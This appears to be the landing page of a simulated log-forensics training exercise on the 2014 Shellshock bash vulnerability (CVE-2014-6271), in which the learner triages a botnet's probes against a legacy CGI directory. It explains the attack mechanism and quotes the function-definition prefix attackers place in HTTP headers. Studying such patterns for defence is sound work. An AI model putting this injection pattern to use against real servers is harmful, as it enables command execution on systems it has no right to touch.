Envoi

September 24, 2014. Someone realises you can stash arbitrary bash commands in HTTP headers and have them executed by CGI scripts. Half the web runs bash as `/bin/sh`.

Type

Classic

Difficulty

Intermediate

Era

2010s

Time

9 min

Briefing

Apache still has `/cgi-bin/` turned on for some PHP-era apps. Attackers probe with crafted `User-Agent`/`Cookie` strings that start with `() { :; };`. Your job is log forensics only.

Your role

On-call engineer triaging a botnet's sweep through your leftover CGI directory.

Objective

Recognise the CVE-2014-6271 pattern in access logs and tie it to bash parsing function exports.

Terminal environment

user: responder
host: apache-bridge
cwd: /var/log/www-legacy
steps: 3

Enter the terminalAbout 9 minutesSafe simulation

Safety note. This is a safe reconstruction. All systems, files, hosts, credentials, and outputs are simulated. Do not use these techniques on systems you do not own or have explicit permission to test.